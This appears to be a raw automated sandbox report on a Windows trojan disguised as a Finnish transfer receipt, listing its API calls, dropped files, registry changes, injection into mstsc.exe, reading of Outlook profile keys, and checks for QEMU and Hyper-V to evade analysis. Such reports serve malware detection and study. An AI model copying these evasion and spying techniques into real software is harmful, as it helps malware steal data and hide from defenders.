      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403489
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\StandpostJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile created: C:\Users\user\AppData\Local\Temp\nsf283.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/9@23/17
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,1_2_004020FE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00404814 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404814
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile created: C:\Program Files (x86)\SandpapiretJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CarmenJump to behavior
      Source: Siirtokuitti_006703.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmp
      Source: Binary string: wntdll.pdbUGP source: Siirtokuitti_006703.exe, 00000003.00000003.19290237020.00000000375EA000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19283597652.000000003743B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Siirtokuitti_006703.exe, 00000003.00000003.19290237020.00000000375EA000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19283597652.000000003743B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe
      Source: Binary string: mstsc.pdbGCTL source: Siirtokuitti_006703.exe, 00000001.00000003.19306032866.00000000093B9000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000001.00000003.19304004948.0000000009272000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19325433829.00000000374AE000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19327317521.0000000000061000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmp
      Source: Binary string: mstsc.pdb source: Siirtokuitti_006703.exe, 00000001.00000003.19306032866.00000000093B9000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000001.00000003.19304004948.0000000009272000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19325433829.00000000374AE000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19327317521.0000000000061000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000001.00000002.19311035785.000000000849F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332777A push edi; retf 1_2_03327789
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03328B52 push esi; iretd 1_2_03328B62
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03324AE1 push ebp; iretd 1_2_03324AE4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033272D0 push es; retf 1_2_033272D3
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_033286D5 push edx; retf 1_2_033286E8
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03329178 push ds; ret 1_2_0332917C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03325551 pushfd ; ret 1_2_03325552
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_0332619F push ss; ret 1_2_033261A1
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03325428 push edi; retf 1_2_03325445
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_03329C41 push esi; iretd 1_2_03329C4A
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091C60BB push ss; retf 1_2_091C60BD
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091BE0D2 push esp; ret 1_2_091BE0D4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D30CA push esi; iretd 1_2_091D30CB
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091C5D38 pushfd ; retf 1_2_091C5D42
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091C8DE2 pushad ; retf 1_2_091C8DE5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091C5E01 push E0A5A067h; ret 1_2_091C5E27
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01669178 push ds; ret 3_2_0166917C
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01665551 pushfd ; ret 3_2_01665552
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166619F push ss; ret 3_2_016661A1
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01669C41 push esi; iretd 3_2_01669C4A
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01665428 push edi; retf 3_2_01665445
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_0166777A push edi; retf 3_2_01667789
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01668B52 push esi; iretd 3_2_01668B62
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_01664AE1 push ebp; iretd 3_2_01664AE4
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016686D5 push edx; retf 3_2_016686E8
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 3_2_016672D0 push es; retf 3_2_016672D3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046197A1 push es; iretd 5_2_046197A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046121AD pushad ; retf 0004h5_2_0461223F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046408CD push ecx; mov dword ptr [esp], ecx5_2_046408D6
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0033C0BB push ss; retf 5_2_0033C0BD
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile created: C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19309297853.0000000000757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXET~B
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19309297853.0000000000795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXERI&
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 8556Thread sleep count: 126 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exe TID: 8556Thread sleep time: -252000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8848Thread sleep time: -65000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8848Thread sleep count: 32 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8848Thread sleep time: -48000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 8848Thread sleep count: 42 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 8848Thread sleep time: -42000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D70E2 rdtsc 1_2_091D70E2
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 890Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeAPI coverage: 2.6 %
      Source: C:\Windows\SysWOW64\mstsc.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_004066F3 FindFirstFileW,FindClose,1_2_004066F3
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405ABE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00402862 FindFirstFileW,1_2_00402862
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_00343470 FindFirstFileW,FindNextFileW,FindClose,5_2_00343470
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_003435A5 FindFirstFileW,FindNextFileW,FindClose,5_2_003435A5
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeAPI call chain: ExitProcess graph end nodegraph_1-25880
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeAPI call chain: ExitProcess graph end nodegraph_1-25883
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: Siirtokuitti_006703.exe, 00000003.00000003.19288047371.000000000761A000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19286802147.000000000761A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19309297853.0000000000757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exet~B
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19309297853.0000000000795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeri&
      Source: Siirtokuitti_006703.exe, 00000001.00000002.19421830249.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_091D70E2 rdtsc 1_2_091D70E2
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04648470 mov eax, dword ptr fs:[00000030h]5_2_04648470
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04648470 mov eax, dword ptr fs:[00000030h]5_2_04648470
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470A464 mov eax, dword ptr fs:[00000030h]5_2_0470A464
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF478 mov eax, dword ptr fs:[00000030h]5_2_046FF478
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650445 mov eax, dword ptr fs:[00000030h]5_2_04650445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650445 mov eax, dword ptr fs:[00000030h]5_2_04650445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650445 mov eax, dword ptr fs:[00000030h]5_2_04650445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650445 mov eax, dword ptr fs:[00000030h]5_2_04650445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650445 mov eax, dword ptr fs:[00000030h]5_2_04650445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04650445 mov eax, dword ptr fs:[00000030h]5_2_04650445
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C0443 mov eax, dword ptr fs:[00000030h]5_2_046C0443
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464D454 mov eax, dword ptr fs:[00000030h]5_2_0464D454
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464D454 mov eax, dword ptr fs:[00000030h]5_2_0464D454
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464D454 mov eax, dword ptr fs:[00000030h]5_2_0464D454
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464D454 mov eax, dword ptr fs:[00000030h]5_2_0464D454
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464D454 mov eax, dword ptr fs:[00000030h]5_2_0464D454
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464D454 mov eax, dword ptr fs:[00000030h]5_2_0464D454
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467D450 mov eax, dword ptr fs:[00000030h]5_2_0467D450
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467D450 mov eax, dword ptr fs:[00000030h]5_2_0467D450
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E45E mov eax, dword ptr fs:[00000030h]5_2_0466E45E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E45E mov eax, dword ptr fs:[00000030h]5_2_0466E45E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E45E mov eax, dword ptr fs:[00000030h]5_2_0466E45E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E45E mov eax, dword ptr fs:[00000030h]5_2_0466E45E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E45E mov eax, dword ptr fs:[00000030h]5_2_0466E45E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04677425 mov eax, dword ptr fs:[00000030h]5_2_04677425
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04677425 mov ecx, dword ptr fs:[00000030h]5_2_04677425
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CF42F mov eax, dword ptr fs:[00000030h]5_2_046CF42F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CF42F mov eax, dword ptr fs:[00000030h]5_2_046CF42F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CF42F mov eax, dword ptr fs:[00000030h]5_2_046CF42F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CF42F mov eax, dword ptr fs:[00000030h]5_2_046CF42F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CF42F mov eax, dword ptr fs:[00000030h]5_2_046CF42F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463B420 mov eax, dword ptr fs:[00000030h]5_2_0463B420
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046C9429 mov eax, dword ptr fs:[00000030h]5_2_046C9429
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF409 mov eax, dword ptr fs:[00000030h]5_2_046FF409
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D6400 mov eax, dword ptr fs:[00000030h]5_2_046D6400
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D6400 mov eax, dword ptr fs:[00000030h]5_2_046D6400
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463640D mov eax, dword ptr fs:[00000030h]5_2_0463640D
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046754E0 mov eax, dword ptr fs:[00000030h]5_2_046754E0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467E4EF mov eax, dword ptr fs:[00000030h]5_2_0467E4EF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467E4EF mov eax, dword ptr fs:[00000030h]5_2_0467E4EF
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046FF4FD mov eax, dword ptr fs:[00000030h]5_2_046FF4FD
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046464F0 mov eax, dword ptr fs:[00000030h]5_2_046464F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467A4F0 mov eax, dword ptr fs:[00000030h]5_2_0467A4F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467A4F0 mov eax, dword ptr fs:[00000030h]5_2_0467A4F0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046694FA mov eax, dword ptr fs:[00000030h]5_2_046694FA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046614C9 mov eax, dword ptr fs:[00000030h]5_2_046614C9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046614C9 mov eax, dword ptr fs:[00000030h]5_2_046614C9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046614C9 mov eax, dword ptr fs:[00000030h]5_2_046614C9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046614C9 mov eax, dword ptr fs:[00000030h]5_2_046614C9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046614C9 mov eax, dword ptr fs:[00000030h]5_2_046614C9
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466F4D0 mov eax, dword ptr fs:[00000030h]5_2_0466F4D0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046644D1 mov eax, dword ptr fs:[00000030h]5_2_046644D1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046644D1 mov eax, dword ptr fs:[00000030h]5_2_046644D1
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046424A2 mov eax, dword ptr fs:[00000030h]5_2_046424A2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046424A2 mov ecx, dword ptr fs:[00000030h]5_2_046424A2
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CD4A0 mov ecx, dword ptr fs:[00000030h]5_2_046CD4A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CD4A0 mov eax, dword ptr fs:[00000030h]5_2_046CD4A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CD4A0 mov eax, dword ptr fs:[00000030h]5_2_046CD4A0
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046744A8 mov eax, dword ptr fs:[00000030h]5_2_046744A8
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046D84BB mov eax, dword ptr fs:[00000030h]5_2_046D84BB
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467E4BC mov eax, dword ptr fs:[00000030h]5_2_0467E4BC
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04640485 mov ecx, dword ptr fs:[00000030h]5_2_04640485
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467648A mov eax, dword ptr fs:[00000030h]5_2_0467648A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467648A mov eax, dword ptr fs:[00000030h]5_2_0467648A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467648A mov eax, dword ptr fs:[00000030h]5_2_0467648A
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467B490 mov eax, dword ptr fs:[00000030h]5_2_0467B490
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467B490 mov eax, dword ptr fs:[00000030h]5_2_0467B490
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_046CC490 mov eax, dword ptr fs:[00000030h]5_2_046CC490
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465C560 mov eax, dword ptr fs:[00000030h]5_2_0465C560
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465E547 mov eax, dword ptr fs:[00000030h]5_2_0465E547
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0470A553 mov eax, dword ptr fs:[00000030h]5_2_0470A553
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04676540 mov eax, dword ptr fs:[00000030h]5_2_04676540
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04678540 mov eax, dword ptr fs:[00000030h]5_2_04678540
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0464254C mov eax, dword ptr fs:[00000030h]5_2_0464254C
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471B55F mov eax, dword ptr fs:[00000030h]5_2_0471B55F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0471B55F mov eax, dword ptr fs:[00000030h]5_2_0471B55F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04671527 mov eax, dword ptr fs:[00000030h]5_2_04671527
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0467F523 mov eax, dword ptr fs:[00000030h]5_2_0467F523
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465252B mov eax, dword ptr fs:[00000030h]5_2_0465252B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465252B mov eax, dword ptr fs:[00000030h]5_2_0465252B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465252B mov eax, dword ptr fs:[00000030h]5_2_0465252B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465252B mov eax, dword ptr fs:[00000030h]5_2_0465252B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465252B mov eax, dword ptr fs:[00000030h]5_2_0465252B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465252B mov eax, dword ptr fs:[00000030h]5_2_0465252B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0465252B mov eax, dword ptr fs:[00000030h]5_2_0465252B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04682539 mov eax, dword ptr fs:[00000030h]5_2_04682539
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04643536 mov eax, dword ptr fs:[00000030h]5_2_04643536
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_04643536 mov eax, dword ptr fs:[00000030h]5_2_04643536
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463753F mov eax, dword ptr fs:[00000030h]5_2_0463753F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463753F mov eax, dword ptr fs:[00000030h]5_2_0463753F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0463753F mov eax, dword ptr fs:[00000030h]5_2_0463753F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_0466E507 mov eax, dword ptr fs:[00000030h]5_2_0466E507
